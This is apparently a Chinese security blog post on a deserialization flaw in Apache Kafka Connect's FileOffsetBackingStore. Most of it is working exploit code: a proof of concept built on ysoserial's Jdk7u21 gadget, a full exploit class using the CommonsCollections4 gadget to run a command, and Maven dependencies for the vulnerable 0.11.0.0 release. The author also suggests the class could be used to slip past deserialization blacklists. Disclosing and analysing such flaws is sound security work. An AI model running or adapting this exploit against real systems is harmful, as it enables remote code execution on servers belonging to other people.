Apache Kafkafa反序列化漏洞

作者直接给出了漏洞Poc:CVE-IDs request for Apache Kafka desrialization vulnerability via runtime

import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

public void test_Kafka_Deser() throws Exception {

        StandaloneConfig config;

        String projectDir = System.getProperty("user.dir");

        Jdk7u21 jdk7u21 = new Jdk7u21();
        Object o = jdk7u21.getObject("touch vul");

        byte[] ser = serialize(o);

        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    private byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bout);
        out.writeObject(object);
        out.flush();
        return bout.toByteArray();
    }

咨询了下研发人员,说他们代码里面没有这个class。这个反序列化应该可以用来bypass一些黑名单。类似于MarshalledObject类bypass weblogic。

通过全局搜索在源码中的测试用例也存在有漏洞的写法,不知道这个类是否有其他的使用场景?可以一起交流下。

FileOffsetBackingStore.png

搭建环境测试:

package ysoserial.exploit;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.CommonsCollections4;
import ysoserial.payloads.Jdk7u21;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

public class KafkaExploitTest {
    public static void test_Kafka_Deser() throws Exception {
        StandaloneConfig config;
        String projectDir = System.getProperty("user.dir");
        CommonsCollections4 cc4 = new CommonsCollections4();
        Object o = cc4.getObject("calc");

        byte[] ser = serialize(o);

        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG, tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    private static byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bout);
        out.writeObject(object);
        out.flush();
        return bout.toByteArray();
    }

    public static void main(String[] args) throws Exception{
        KafkaExploitTest.test_Kafka_Deser();
    }
}

Pom.xml添加依赖:

<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-runtime -->
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>connect-runtime</artifactId>
<version>0.11.0.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-json -->
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>connect-json</artifactId>
<version>0.11.0.0</version>
<scope>test</scope>
</dependency>

calc.png

漏洞Demo:

[@Test](/user/Test)
   public void testSaveRestore() throws Exception {
       Callback<Void> setCallback = expectSuccessfulSetCallback();
       Callback<Map<ByteBuffer, ByteBuffer>> getCallback = expectSuccessfulGetCallback();
       PowerMock.replayAll();

       store.set(firstSet, setCallback).get();
       store.stop();

       // Restore into a new store to ensure correct reload from scratch
       FileOffsetBackingStore restore = new FileOffsetBackingStore();
       restore.configure(config);
       restore.start();
       Map<ByteBuffer, ByteBuffer> values = restore.get(Arrays.asList(buffer("key")), getCallback).get();
       assertEquals(buffer("value"), values.get(buffer("key")));

       PowerMock.verifyAll();
   }

业务序列化使用avro或者json居多。如果用jdk原生方式,应该会用到这个函数进行反序列化。

标签: 反序列化漏洞, Apache Kafkafa, kafkafa

添加新评论